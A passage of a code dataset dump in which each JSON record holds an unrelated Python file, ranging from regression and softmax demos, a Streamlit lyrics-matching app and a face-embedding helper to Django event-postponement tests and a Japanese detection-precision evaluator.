:\"+str(score)\n\tax.set_title(title)\n\t\n\t\n\tplt.show()\n\t\n\n#load the csv dataset into a varible dataset\n\ndataset = pd.read_csv('day.csv', index_col=0)\n\n\t\nprint(dataset.head(10))\nprint(dataset.describe())\n#print(dataset.dtypes)\n\ndataset.dteday= pd.to_datetime(dataset.dteday)\n\n#print(dataset.dtypes)\n#print(dataset.isna().sum())\n#print(dataset.corr())\n#exit()\n\n#dataset1 = pd.concat([dataset.atemp,dataset.hum,],axis= 1)\n#print(dataset1.head())\n#dataset1.plot.hist(alpha=0.5)\n#plt.show()\n#exit()\n\t\n\t\ndef predict_atemp(p_atemp):\n\n\tif p_atemp > 0.840896 or p_atemp < 0.079070:\n\t\traise ValueError('atemp should be the value between 0.840896 and 0.079070')\n\t\n\t#prepare the training data with corresponding labels for modeling the data\n\t\n\tdataset_train=dataset.atemp[dataset.dteday < '2011-12-31']\n\tdataset_train = dataset_train.to_frame()\n\tlabel_train=dataset.cnt[dataset.dteday < '2011-12-31']\n\t#print(type(dataset_train))\n\t#exit()\n\t\n\t#create the linear regression model and save into the variable model and fit the traing data into it and pass it\n\t#to the regressionline\n\tmodel = linear_model.LinearRegression()\n\tmodel.fit(dataset_train,label_train)\n\tregressionline(model,dataset_train,label_train,\"count for temperature(atemp)\")\n\t\n\t#test_atemp=0.229270\n\ttest_atemp=p_atemp\n\tpredict_cnt= model.predict([[test_atemp]])[0]\n\t\n\tprint(\"count(atemp), R2: \",model.score(dataset_train,label_train))\n\tprint(\"for atemp {0} predicted count is {1}\".format(test_atemp,int(predict_cnt)))\n\treturn int(predict_cnt )\n\t\n\t#if you want predict count for the value within the dataset,you have the actual count as well then you can uncomment the line here\n\t\n\t#actual_cnt=1600\n\t#print(\"for atemp {0} actual count is {1}\".format(test_atemp,actual_cnt))\n\ndef predict_hum(p_hum):\n\t\n\tif p_atemp > 0.972500 or p_atemp < 0.000000:\n\t\traise ValueError('windspeed should be the value between 0.022392 and 0.507463')\n\t\n\t#prepare the training data with corresponding labels for modeling the data\n\t\n\tdataset_train=dataset.hum[dataset.dteday < '2011-12-31']\n\tdataset_train = dataset_train.to_frame()\n\tlabel_train=dataset.cnt[dataset.dteday < '2011-12-31']\n\t#print(type(dataset_train))\n\t#exit()\n\t\n\t#create the linear regression model and save into the variable model and fit the traing data into it and pass it\n\t#to the regressionline\n\tmodel = linear_model.LinearRegression()\n\tmodel.fit(dataset_train,label_train)\n\tregressionline(model,dataset_train,label_train,\"count for temperature(hum)\")\n\t\n\t#test_atemp=0.229270\n\ttest_hum=p_hum\n\tpredict_cnt= model.predict([[test_hum]])[0]\n\t\n\tprint(\"count(hum), R2: \",model.score(dataset_train,label_train))\n\tprint(\"for hum {0} predicted count is {1}\".format(test_hum,int(predict_cnt)))\n\treturn int(predict_cnt) \n\t\n\t\n \t\ndef predict_windspeed(p_windspeed):\n\n\tif p_atemp > 0.507463 or p_atemp < 0.022392:\n\t\traise ValueError('windspeed should be the value between 0.022392 and 0.507463')\n\n\t\n\tdataset_train=dataset.windspeed[dataset.dteday < '2011-12-31']\n\tdataset_train = dataset_train.to_frame()\n\tlabel_train=dataset.cnt[dataset.dteday < '2011-12-31']\n\t\n\tmodel = linear_model.LinearRegression()\n\tmodel.fit(dataset_train,label_train)\n\tregressionline(model,dataset_train,label_train,\"count for windspeed\")\n\t\n\ttest_windspeed=p_windspeed\n\t#actual_cnt=1600\n\tpredict_cnt= model.predict([[test_windspeed]])[0]\n\t\n\tprint(\"count(windspeed), R2: \",model.score(dataset_train,label_train))\n\tprint(\"for windspeed {0} predicted count is {1}\".format(test_windspeed,int(predict_cnt)))\n\t#print(\"for windspeed {0} actual count is {1}\".format(test_windspeed,actual_cnt))\n\treturn int(predict_cnt)","sub_path":"src/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"330211290","text":"'''\nFile Name: writeCSV.py\nDescription:\n@author:czf\nCreated on 16:45 12-02 2018\n'''\n\nimport csv\n\ndef writeCsv(path, data):\n with open(path, \"w\") as f:\n writer = csv.writer(f)\n for rowData in data:\n writer.writerow(rowData)\n\n\npath = r\"\"\nwriteCsv(path, [[], [], []])","sub_path":"writeCSV.py","file_name":"writeCSV.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"332979921","text":"from fila import Fila\r\nfrom random import randint\r\nfrom time import sleep\r\nimport sys\r\n\r\nfilaBanco = Fila()\r\n\r\ndef EntrarNaFila(cliente):\r\n print(\"Cliente entrando na fila do caixa...\")\r\n filaBanco.ENQUEUE(cliente)\r\n\r\ndef Atender():\r\n for i in range(filaBanco.LENGTH()):\r\n cliente = filaBanco.DEQUEUE()\r\n \r\n tempo_Atendimento = randint(1,10)\r\n print(\"Cliente sendo atendido...\\n\")\r\n\r\n sleep(tempo_Atendimento)\r\n print(\"Atendimento terminado!\\n\")\r\n print(\"O atendimento demorou %d minutos. \"%(tempo_Atendimento))\r\n \r\n \r\n\r\ndef Sair():\r\n print(\"Saindo...\")\r\n sys.exit()\r\n\r\ndef main(): \r\n print(\"-------------- BANCO--------------\\n\")\r\n print(\"TECLE: \\n\", \"1- Entrar na fila do caixa de atendimento\\n\", \"2- Atendimento\\n\",\"3- Sair.\\n\")\r\n\r\n comando = int(input(\"Tecle o número do comando que voce deseja utilizar: \\n\"))\r\n\r\n \r\n while comando !=3:\r\n if comando == 1:\r\n cliente = input(\"Informe o nome do cliente: \")\r\n EntrarNaFila(cliente)\r\n \r\n comando = int(input(\"Tecle o número do comando que quer utilizar: \\n\"))\r\n \r\n\r\n if comando == 2:\r\n Atender()\r\n\r\n elif comando == 3:\r\n Sair()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"AtividadeFila2/Atividade Fila 02/Questão 04.py","file_name":"Questão 04.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"305762289","text":"import pandas as pd\nimport numpy as np\nimport streamlit as st\n\nst.sidebar.title(\"LyricsMatch\")\n\nst.sidebar.info(\"This is a POC application for LyricsMatch.\")\n\nenglish_lyrics = pd.read_csv(\"english_lyrics_first50.csv\")\nenglish_lyrics = english_lyrics[english_lyrics['lang'] == 'en']\n\nhindi_lyrics = pd.read_csv(\"experiments/data/hindilyrics_pratik.csv\")\n\nimport numpy as np\ndim = 1024\n\nhindi_embeddings = np.fromfile(\"experiments/data/embeddings/pratik_hindi_embeddings.raw\", dtype=np.float32, count=-1)\nhindi_embeddings.resize(hindi_embeddings.shape[0] // dim, dim)\n\nenglish_embeddings = np.load(\"english_embeddings.npy\")\n# english_embeddings.resize(english_embeddings.shape[0] // dim, dim)\n\nd=1024\nimport faiss # make faiss available\nindex = faiss.IndexFlatL2(d) # build the index\n# print(index.is_trained)\nindex.add(hindi_embeddings) # add vectors to the index\n# print(index.ntotal)\n\nselect = st.sidebar.selectbox(\"Pick a song.\", english_lyrics[\"song\"][:100])\nselected_index = english_lyrics[english_lyrics[\"song\"]==select].index[0]\n\nst.write(select)\nst.text(english_lyrics[english_lyrics[\"song\"]==select].iloc[0][\"lyrics\"])\n\nk = 3 # we want to see 4 nearest neighbors\nD, I = index.search(english_embeddings[selected_index:selected_index+1], k) \n\nfor s_no,i in enumerate(I[0]):\n st.text(\"Similar Song Discovered : \" + str(s_no+1))\n st.text(hindi_lyrics.iloc[i]['Song'])","sub_path":"heroku/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489777427","text":"# LAB EXERCISE 04\nprint('Lab Exercise 04 \\n')\n\n# Setup\ngrammy_winners = [\n [\"Whitney Houston\", \"Pop\", 6],\n [\"Michael Jackson\", \"Pop\", 19],\n [\"Carrie Underwood\", \"Country\", 7],\n [\"Adell\", \"Soul\", 15],\n [\"Beyonce\", \"Pop\", 20],\n [\"Kendrick Lamar\", \"Hip-Hop\", 12],\n [\"Drake\", \"R&B Rap\", 5]\n ]\n\n# Problem 01 (3 points)\n\nartist_names = []\n\n\n# Problem 02 (3 points)\n\npop_genre = []\n\n\n# Problem 03 (4 points)\n\ngrammy_count_diff = 0\n\n\n# Problem 04 (5 points)\n\nfive_to_seven_grammies = []\n\n\n# Problem 05 (5 points)\n\ntop_artist = None\ncount = 0\n","sub_path":"lab_exercise_04/lab_exercise_04.py","file_name":"lab_exercise_04.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162695921","text":"for i in range(4):\r\n print(\"hello! world\")\r\n\r\ndef repeat(x):\r\n size = len(x)\r\n repeated = []\r\n for i in range(size):\r\n k = i + 1\r\n for j in range(k,size):\r\n if x[i] == x[j] and x[i] not in repeated:\r\n repeated.append(x[i])\r\n return repeated\r\n\r\n \r\nlst = [10,20,50,30,10,20,20,40]\r\nprint(repeat(lst))\r\n\r\ndef group(l,n):\r\n for i in range(0,len(l),n):\r\n yield l[i:i + n]\r\n\r\nn = 5\r\nmy_list = [2,5,6,8,3,3,4,3,7,5]\r\nx = list(group(my_list,n))\r\nprint(x)\r\n\r\n \r\ndef lensort(list2):\r\n plist = sorted(list2,key=len)\r\n return plist\r\nlist2 = ['sana','karan','gaurav','shrotriya','aggarwal']\r\nprint(lensort(list2))\r\n","sub_path":"lab2.python.py","file_name":"lab2.python.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"69062100","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#dataset\nnum_of_sam = 40\nstd_dv = 1.8\n\ngroup1 = np.array([0,0])+np.random.randn(num_of_sam, 2)*std_dv\ngroup2 = np.array([5,5])+np.random.randn(num_of_sam, 2)*std_dv\ngroup3 = np.array([5,-5])+np.random.randn(num_of_sam, 2)*std_dv\ngroup4 = np.array([-5,-5])+np.random.randn(num_of_sam, 2)*std_dv\ngroup5 = np.array([-5,5])+np.random.randn(num_of_sam, 2)*std_dv\nX = np.vstack((group1, group2, group3, group4, group5))\n\nt_group1 = np.tile([0,0,0,0,1],(num_of_sam,1))\nt_group2 = np.tile([0,0,0,1,0],(num_of_sam,1))\nt_group3 = np.tile([0,0,1,0,0],(num_of_sam,1))\nt_group4 = np.tile([0,1,0,0,0],(num_of_sam,1))\nt_group5 = np.tile([1,0,0,0,0],(num_of_sam,1))\nT = np.vstack((t_group1, t_group2, t_group3, t_group4, t_group5))\n\n#function\ndef softmax(x):\n return np.exp(x) / np.sum(np.exp(x), axis=1, keepdims=True)\n\ndef loss(y, t):\n return -np.sum(np.multiply(t, np.log(y)) + np.multiply((1 - t), np.log(1 - y)))\n\n#initial setting\nW = np.random.randn(2,5)\nB = np.random.randn(1,5)\n\nlearning_rate = 0.003\nE_save = []\n\n#iteration\nnum_of_itr = 400\nfor i in range(num_of_itr):\n #forward propagation\n Y = softmax(np.dot(X, W)+B)\n E = loss(Y, T)\n E_save = np.append(E_save, E)\n #back propagation\n dW = X.T.dot(Y-T)\n dB = np.sum(Y-T, axis=0, keepdims=True)\n #update\n W = W - learning_rate*dW\n B = B - learning_rate*dB\n\n#plot\ngrid_range = 10\nresolution = 50\nx1_grid = x2_grid = np.linspace(-grid_range, grid_range, resolution)\n\nxx, yy = np.meshgrid(x1_grid, x2_grid)\nX_grid = np.c_[xx.ravel(), yy.ravel()]\n\nY_grid = softmax(np.dot(X_grid, W)+B)\nY_predict = np.around(Y_grid)\n\nout_connect = np.hstack((X_grid,Y_predict))\nblue_group = out_connect[out_connect[:,2]==1]\ngreen_group = out_connect[out_connect[:,3]==1]\nred_group = out_connect[out_connect[:,4]==1]\nblack_group = out_connect[out_connect[:,5]==1]\nyellow_group = out_connect[out_connect[:,6]==1]\n\nplt.figure()\nplt.xlim(-grid_range,grid_range)\nplt.ylim(-grid_range,grid_range)\nplt.grid(True)\nplt.title(\"Deep Learning\")\nplt.xlabel(\"input(x1)\")\nplt.ylabel(\"input(x2)\")\n\n#plot_dataset\nplt.scatter(group1[:,0],group1[:,1],marker='o',color='yellow')\nplt.scatter(group2[:,0],group2[:,1],marker='o',color='black')\nplt.scatter(group3[:,0],group3[:,1],marker='o',color='red')\nplt.scatter(group4[:,0],group4[:,1],marker='o',color='green')\nplt.scatter(group5[:,0],group5[:,1],marker='o',color='blue')\n\n#plot_output\nplt.scatter(blue_group[:,0],blue_group[:,1],marker='o',alpha=0.3,color='blue')\nplt.scatter(red_group[:,0],red_group[:,1],marker='o',alpha=0.3,color='red')\nplt.scatter(green_group[:,0],green_group[:,1],marker='o',alpha=0.3,color='green')\nplt.scatter(black_group[:,0],black_group[:,1],marker='o',alpha=0.3,color='black')\nplt.scatter(yellow_group[:,0],yellow_group[:,1],marker='o',alpha=0.3,color='yellow')\n\nplt.show()\n\n#plot_loss\nplt.figure()\nplt.grid(True)\nplt.title(\"LOSS FUNCTION\")\nplt.xlabel(\"Iteration number\")\nplt.ylabel(\"loss value\")\nplt.ylim(0,50)\nplt.plot(E_save)\nplt.show()\n","sub_path":"mondai3_4_2.py","file_name":"mondai3_4_2.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"139227238","text":"#!/usr/bin/env python2\nimport time\nimport argparse\nimport cv2\nimport itertools\nimport os\n\nimport numpy as np\nfrom scipy import misc\n\nimport openface\nimport redis\nimport pickle\nfrom PIL import Image\n\n\nclass load_lib(object):\n def __init__(self, face_cascade, network_model, dlib_face_predictor, dim=96):\n self.face_cascade = cv2.CascadeClassifier(face_cascade)\n self.net = openface.TorchNeuralNet(network_model, dim)\n self.align = openface.AlignDlib(dlib_face_predictor)\n pool = redis.ConnectionPool(host='localhost', port=6379, db=0)\n self.r = redis.Redis(connection_pool=pool)\n self.dim = dim\n\n def face_detect(self, img):\n faces = self.face_cascade.detectMultiScale(img, 1.3, 5)\n list_face = []\n for (x,y,w,h) in faces:\n sub_face = img[y:y+h, x:x+w]\n if sub_face.shape[0] > self.dim and sub_face.shape[1] > self.dim:\n cropped = misc.imresize(sub_face, (self.dim, self.dim), interp='bilinear')\n list_face.append(cropped)\n return list_face\n\n def align_function(self,img):\n # aligned_face = self.align.align(self.dim, img,landmarkIndices=openface.AlignDlib.INNER_EYES_AND_BOTTOM_LIP)\n aligned_face = self.align.align(self.dim, img,landmarkIndices=openface.AlignDlib.INNER_EYES_AND_BOTTOM_LIP)\n return aligned_face\n\n def get_vector(self,img):\n vector = self.net.forward(img)\n return vector\n\n def save_redis(self,img,vector):\n self.r.set(img,pickle.dumps(vector))\n\n\nif __name__ == '__main__':\n lib = load_lib(face_cascade='/home/dsvn/workspace/openface/models/dlib/haarcascade_frontalface_default.xml'\n , networkModel='/home/dsvn/workspace/openface/models/openface/nn4.small2.v1.t7'\n , dlibFacePredictor='/home/dsvn/workspace/openface/models/dlib/shape_predictor_68_face_landmarks.dat')\n \n #########\n img_path = '/home/dsvn/Documents/hongnt/fb_image/HA_Phuong_Thao_files/476_221171921357240_1689212226_n.jpg'\n im = np.asarray(Image.open(img_path))\n face = lib.face_detect(im)\n for i in range(len(face)):\n misc.imsave(\"test_\"+str(i)+\".png\", face[i])\n face_align = lib.align_function(np.array(face[i]))\n if face_align is not None:\n vector = lib.get_vector(face_align)\n lib.save_redis(img_path+\".\"+str(i) ,vector)\n\n","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"34173595","text":"# ------------------------------------------------------------------------------\n# Test Postponement Page\n# ------------------------------------------------------------------------------\nimport sys\nimport pytz\nimport datetime as dt\nfrom django.test import RequestFactory, TestCase\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom wagtail.core.models import Page\nfrom ls.joyous.models.calendar import GeneralCalendarPage\nfrom ls.joyous.models.events import RecurringEventPage\nfrom ls.joyous.models.events import PostponementPage\nfrom ls.joyous.models.events import CancellationPage\nfrom ls.joyous.utils.recurrence import Recurrence, WEEKLY, MO, WE, FR\n\n\nclass TestPostponement(TestCase):\n def setUp(self):\n self.home = Page.objects.get(slug='home')\n self.user = User.objects.create_user('j', 'j@joy.test', 's3(r3t')\n self.request = RequestFactory().get(\"/test\")\n self.request.user = self.user\n self.request.session = {}\n self.calendar = GeneralCalendarPage(owner = self.user,\n slug = \"events\",\n title = \"Events\")\n self.home.add_child(instance=self.calendar)\n self.calendar.save_revision().publish()\n self.event = RecurringEventPage(slug = \"test-meeting\",\n title = \"Test Meeting\",\n repeat = Recurrence(dtstart=dt.date(1990,1,1),\n freq=WEEKLY,\n byweekday=[MO,WE,FR]),\n time_from = dt.time(13,30),\n time_to = dt.time(16))\n self.calendar.add_child(instance=self.event)\n self.postponement = PostponementPage(owner = self.user,\n overrides = self.event,\n except_date = dt.date(1990,10,10),\n cancellation_title = \"Meeting Postponed\",\n cancellation_details =\n \"The meeting has been postponed until tomorrow\",\n postponement_title = \"A Meeting\",\n date = dt.date(1990,10,11),\n time_from = dt.time(13),\n time_to = dt.time(16,30),\n details = \"Yes a test meeting on a Thursday\")\n self.event.add_child(instance=self.postponement)\n self.postponement.save_revision().publish()\n\n def testGetEventsByDay(self):\n events = RecurringEventPage.events.byDay(dt.date(1990,10,1),\n dt.date(1990,10,31))\n self.assertEqual(len(events), 31)\n evod = events[9]\n self.assertEqual(evod.date, dt.date(1990,10,10))\n self.assertEqual(len(evod.days_events), 1)\n self.assertEqual(len(evod.continuing_events), 0)\n title, page = evod.days_events[0]\n self.assertEqual(title, \"Meeting Postponed\")\n self.assertIs(type(page), CancellationPage)\n self.assertIs(type(page.postponementpage), PostponementPage)\n\n events = PostponementPage.events.byDay(dt.date(1990,10,1),\n dt.date(1990,10,31))\n self.assertEqual(len(events), 31)\n evod = events[10]\n self.assertEqual(evod.date, dt.date(1990,10,11))\n self.assertEqual(len(evod.days_events), 1)\n self.assertEqual(len(evod.continuing_events), 0)\n title, page = evod.days_events[0]\n self.assertEqual(title, \"A Meeting\")\n self.assertIs(type(page), PostponementPage)\n\n def testStatus(self):\n self.assertEqual(self.postponement.status, \"finished\")\n self.assertEqual(self.postponement.status_text, \"This event has finished.\")\n now = timezone.localtime()\n myday = now.date() + dt.timedelta(1)\n friday = myday + dt.timedelta(days=(4-myday.weekday())%7)\n futureEvent = PostponementPage(owner = self.user,\n overrides = self.event,\n except_date = friday,\n cancellation_title = \"\",\n cancellation_details = \"\",\n postponement_title = \"Tuesday Meeting\",\n date = friday + dt.timedelta(days=4),\n time_from = dt.time(13,30),\n time_to = dt.time(16),\n details = \"The meeting postponed from last Friday\")\n self.event.add_child(instance=futureEvent)\n self.assertIsNone(futureEvent.status)\n self.assertEqual(futureEvent.status_text, \"\")\n\n def testWhen(self):\n self.assertEqual(self.postponement.when, \"Thursday 11th of October 1990 at 1pm to 4:30pm\")\n\n def testAt(self):\n self.assertEqual(self.postponement.at.strip(), \"1pm\")\n nextDate = self.event.next_date\n newDate = nextDate + dt.timedelta(1)\n reschedule = PostponementPage(owner = self.user,\n overrides = self.event,\n except_date = nextDate,\n cancellation_title = \"\",\n cancellation_details = \"\",\n postponement_title = \"Early Meeting\",\n date = newDate,\n time_from = dt.time(8,30),\n time_to = dt.time(11),\n details = \"The meeting will be held early tomorrow\")\n self.event.add_child(instance=reschedule)\n nextOn = self.event._nextOn(self.request)\n url = \"/events/test-meeting/{}-postponement/\".format(nextDate)\n self.assertEqual(nextOn[:76], ''.format(url))\n self.assertEqual(nextOn[-4:], '')\n parts = nextOn[76:-4].split()\n self.assertEqual(len(parts), 6)\n self.assertEqual(parts[0], \"{:%A}\".format(newDate))\n self.assertEqual(int(parts[1][:-2]), newDate.day)\n self.assertIn(parts[1][-2:], [\"st\", \"nd\", \"rd\", \"th\"])\n self.assertEqual(parts[2], \"of\")\n self.assertEqual(parts[3], \"{:%B}\".format(newDate))\n self.assertEqual(parts[4], \"at\")\n self.assertEqual(parts[5], \"8:30am\")\n\n\nclass TestPostponementTZ(TestCase):\n def setUp(self):\n self.home = Page.objects.get(slug='home')\n self.user = User.objects.create_user('j', 'j@joy.test', 's3(r3t')\n self.calendar = GeneralCalendarPage(owner = self.user,\n slug = \"events\",\n title = \"Events\")\n self.home.add_child(instance=self.calendar)\n self.calendar.save_revision().publish()\n self.event = RecurringEventPage(slug = \"test-meeting\",\n title = \"Test Meeting\",\n repeat = Recurrence(dtstart=dt.date(1990,1,1),\n freq=WEEKLY,\n byweekday=[MO,WE,FR]),\n time_from = dt.time(13,30),\n time_to = dt.time(16),\n tz = pytz.timezone(\"US/Eastern\"))\n self.calendar.add_child(instance=self.event)\n self.postponement = PostponementPage(owner = self.user,\n overrides = self.event,\n postponement_title = \"Delayed Meeting\",\n except_date = dt.date(1990,10,10),\n date = dt.date(1990,10,11),\n time_from = dt.time(13),\n time_to = dt.time(16,30))\n self.event.add_child(instance=self.postponement)\n self.postponement.save_revision().publish()\n\n @timezone.override(\"Pacific/Auckland\")\n def testLocalTitle(self):\n self.assertEqual(self.postponement.title,\n \"Postponement for Wednesday 10th of October 1990\")\n self.assertEqual(self.postponement.localTitle,\n \"Postponement for Thursday 11th of October 1990\")\n\n @timezone.override(\"Asia/Colombo\")\n def testGetEventsByDay(self):\n events = PostponementPage.events.byDay(dt.date(1990,10,1),\n dt.date(1990,10,31))\n self.assertEqual(len(events), 31)\n evod0 = events[10]\n self.assertEqual(evod0.date, dt.date(1990,10,11))\n self.assertEqual(len(evod0.days_events), 1)\n self.assertEqual(len(evod0.continuing_events), 0)\n title, page = evod0.days_events[0]\n self.assertEqual(title, \"Delayed Meeting\")\n self.assertIs(type(page), PostponementPage)\n evod1 = events[11]\n self.assertEqual(evod1.date, dt.date(1990,10,12))\n self.assertEqual(len(evod1.days_events), 0)\n self.assertEqual(len(evod1.continuing_events), 1)\n title, page = evod1.continuing_events[0]\n self.assertEqual(title, \"Delayed Meeting\")\n self.assertIs(type(page), PostponementPage)\n","sub_path":"ls/joyous/tests/test_postponement.py","file_name":"test_postponement.py","file_ext":"py","file_size_in_byte":9825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"447538818","text":"# -*- coding: utf-8 -*-\r\n#----------------------------------------\r\n# ■ 精度評価\r\n#----------------------------------------\r\n\r\nimport os\r\nimport argparse\r\nimport codecs\r\n\r\nimport io_result\r\nimport io_label\r\n\r\n# 出力ファイル名\r\nOUT_FILE_NAME = [\"accuracy.txt\", \"un-detection.txt\", \"mis-detection.txt\"]\r\n\r\n#==============================================\r\n# 実行時パラメータ設定\r\n#==============================================\r\ndef init_args():\r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument(\"-labelfile\", dest = \"label_file\", type = str, help = \"label file path\", required = True)\r\n parser.add_argument(\"-resultfile\", dest = \"result_file\", type = str, help = \"result file path\", required = True)\r\n parser.add_argument(\"-o\", dest = \"output_dir\", type = str, help = \"output directory\", required = True)\r\n \r\n return parser.parse_args()\r\n\r\n#==============================================\r\n# 改行付きファイル出力\r\n#==============================================\r\ndef writeLine(fp, string):\r\n fp.write(string + \"\\n\")\r\n\r\n#==============================================\r\n# 検知、未検知、過検知チェック\r\n#==============================================\r\ndef check_detect(label_data, result_data):\r\n for label in label_data[\"data\"]:\r\n for result in result_data[\"data\"]:\r\n # 違うファイルの場合は無視\r\n if result[\"filename\"] != label[\"filename\"]:\r\n continue\r\n # 検知結果が『_others』(正常)の場合は無視\r\n if result[\"label\"] == \"_others\":\r\n continue\r\n # マーキング座標をチェック\r\n for point in label[\"points\"]:\r\n # マーキング座標が結果矩形の内側かチェック\r\n if result[\"point\"][\"x\"] <= point[\"x\"] <= result[\"point\"][\"x\"] + result[\"width\"] and result[\"point\"][\"y\"] <= point[\"y\"] <= result[\"point\"][\"y\"] + result[\"height\"]:\r\n # 結果矩形の内側の場合はその座標の検知フラグを立てる\r\n point[\"detect\"] = True\r\n # 結果矩形の個所の過検知フラグを下げる(どこかのマーキング座標が内側にある場合は少なくとも過検知ではない)\r\n result[\"missdetect\"] = False\r\n \r\n # マーキング座標がない場合の対応\r\n if len(label[\"points\"]) == 0:\r\n # 結果ファイル内に含まれていれば、未検知フラグを下げる\r\n label[\"undetect\"] = False\r\n continue\r\n \r\n # マーキング座標の検知数を数える\r\n detect_point = 0\r\n for point in label[\"points\"]:\r\n if point[\"detect\"]:\r\n detect_point = detect_point + 1\r\n # どこかの座標が検知されていれば、未検知フラグを下げる\r\n if detect_point >= 1:\r\n label[\"undetect\"] = False # 未検知フラグを下げる\r\n return label_data, result_data\r\n\r\n#==============================================\r\n# 検知数、未検知数、過検知数を数える\r\n#==============================================\r\ndef calc_precision(label_data, result_data):\r\n true_detect_num = 0 # 検知成功数\r\n undetect_num = 0 # 未検知数\r\n missdetect_num = 0 # 過検知数\r\n \r\n image_list = [] # 評価画像を格納\r\n undetect_images = [] # 未検知画像を格納\r\n missdetect_images = [] # 過検知画像を格納\r\n \r\n # 過検知数を数える\r\n for label in label_data[\"data\"]:\r\n # 未検知フラグをチェック\r\n if label[\"undetect\"]:\r\n undetect_num = undetect_num + 1\r\n if label[\"filename\"] not in undetect_images:\r\n undetect_images.append(label[\"filename\"])\r\n else:\r\n true_detect_num = true_detect_num + 1\r\n # 過検知数を数える\r\n for result in result_data[\"data\"]:\r\n # 過検知フラグをチェック\r\n if result[\"missdetect\"]:\r\n missdetect_num = missdetect_num + 1\r\n if result[\"filename\"] not in missdetect_images:\r\n missdetect_images.append(result[\"filename\"])\r\n # 評価画像数チェックのため\r\n if result[\"filename\"] not in image_list:\r\n image_list.append(result[\"filename\"])\r\n \r\n return true_detect_num, undetect_num, missdetect_num, image_list, undetect_images, missdetect_images\r\n\r\n#==============================================\r\n# メイン関数\r\n#==============================================\r\ndef main():\r\n parsed = init_args()\r\n \r\n # ラベルファイル読み込み\r\n label_file = parsed.label_file.strip()\r\n label_data = io_label.readLabelFile(label_file)\r\n # 結果ファイル読み込み\r\n result_file = parsed.result_file.strip()\r\n result_data = io_result.readResultFile(result_file)\r\n # 出力先フォルダ\r\n output_dir = parsed.output_dir.strip()\r\n os.makedirs(output_dir, exist_ok = True)\r\n \r\n # ---検知、未検知、過検知チェック---\r\n label_data, result_data = check_detect(label_data, result_data)\r\n # ---検知数、未検知数、過検知数を数える---\r\n true_detect_num, undetect_num, missdetect_num, image_list, undetect_images, missdetect_images = calc_precision(label_data, result_data)\r\n # マーキング数\r\n label_num = len(label_data[\"data\"])\r\n # 画像数を計算\r\n image_num = len(image_list)\r\n undetect_image_num = len(undetect_images)\r\n missdetect_image_num = len(missdetect_images)\r\n \r\n # ---ファイル出力---\r\n fp = codecs.open(output_dir + \"\\\\\" + OUT_FILE_NAME[0], \"w\", \"utf-8\")\r\n # 画像単位\r\n writeLine(fp, \"検知成功率(Image) {:>7.2%} ({}/{})\".format(((image_num - undetect_image_num) / image_num), (image_num - undetect_image_num), image_num))\r\n writeLine(fp, \"未検知率(Image) {:>7.2%} ({}/{})\".format((undetect_image_num / image_num), undetect_image_num, image_num))\r\n writeLine(fp, \"過検知率(Image) {:>7.2%} ({}/{})\".format((missdetect_image_num / image_num), missdetect_image_num, image_num))\r\n # マーキング単位\r\n if label_num != 0:\r\n writeLine(fp, \"検知成功率(Marking) {:>7.2%} ({}/{})\".format((true_detect_num / label_num), true_detect_num, label_num))\r\n writeLine(fp, \"未検知率(Marking) {:>7.2%} ({}/{})\".format((undetect_num / label_num), undetect_num, label_num))\r\n fp.close()\r\n \r\n # 未検知画像リストの出力\r\n fp = codecs.open(output_dir + \"\\\\\" + OUT_FILE_NAME[1], \"w\", \"utf-8\")\r\n for data in undetect_images:\r\n writeLine(fp, data)\r\n fp.close()\r\n \r\n # 過検知画像リストの出力\r\n fp = codecs.open(output_dir + \"\\\\\" + OUT_FILE_NAME[2], \"w\", \"utf-8\")\r\n for data in missdetect_images:\r\n writeLine(fp, data)\r\n fp.close()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n","sub_path":"CooperationBase/RapidLearningServerProgram/calcPrecision.py","file_name":"calcPrecision.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"568535170","text":"import pandas\nimport matplotlib.pyplot as plt\nimport glob\nimport numpy\n\n# for plotting whycon.png\nfrom pylab import *\nfrom matplotlib.cbook import get_sample_data\nfrom matplotlib._png import read_png\n\n# get all logs\nlog_directory = \"/home/joshua/Documents/radial_land_testing (initial)/*.csv\"\nfilenames = glob.glob(log_directory)\n\nprint(filenames)\n\n# create 3d plot\nfigure = plt.figure(figsize=(15, 11))\naxes = figure.gca(projection=\"3d\")\n\n# plot landing pad\n# whycon_png = get_sample_data(\"/home/joshua/Pictures/whycon.png\", asfileobj=True)\n# img = read_png(whycon_png)\n# x, y = ogrid[0:img.shape[0], 0:img.shape[1]]\n# axes.plot_surface(x, y, 0, rstride=5, cstride=5, facecolors=img)\n\nfn = get_sample_data(\"/home/joshua/Pictures/whycon.png\", asfileobj=True)\nimg = read_png(fn)\nx, y = ogrid[0:img.shape[1], 0:img.shape[0]]\n\nx = x.astype(float) / 225.0 - 0.5\ny = y.astype(float) / 225.0 - 0.5\n\n# ax = gca(projection='3d')\naxes.plot_surface(x, y, 0, rstride=5, cstride=5, facecolors=img)\n\ncolors = 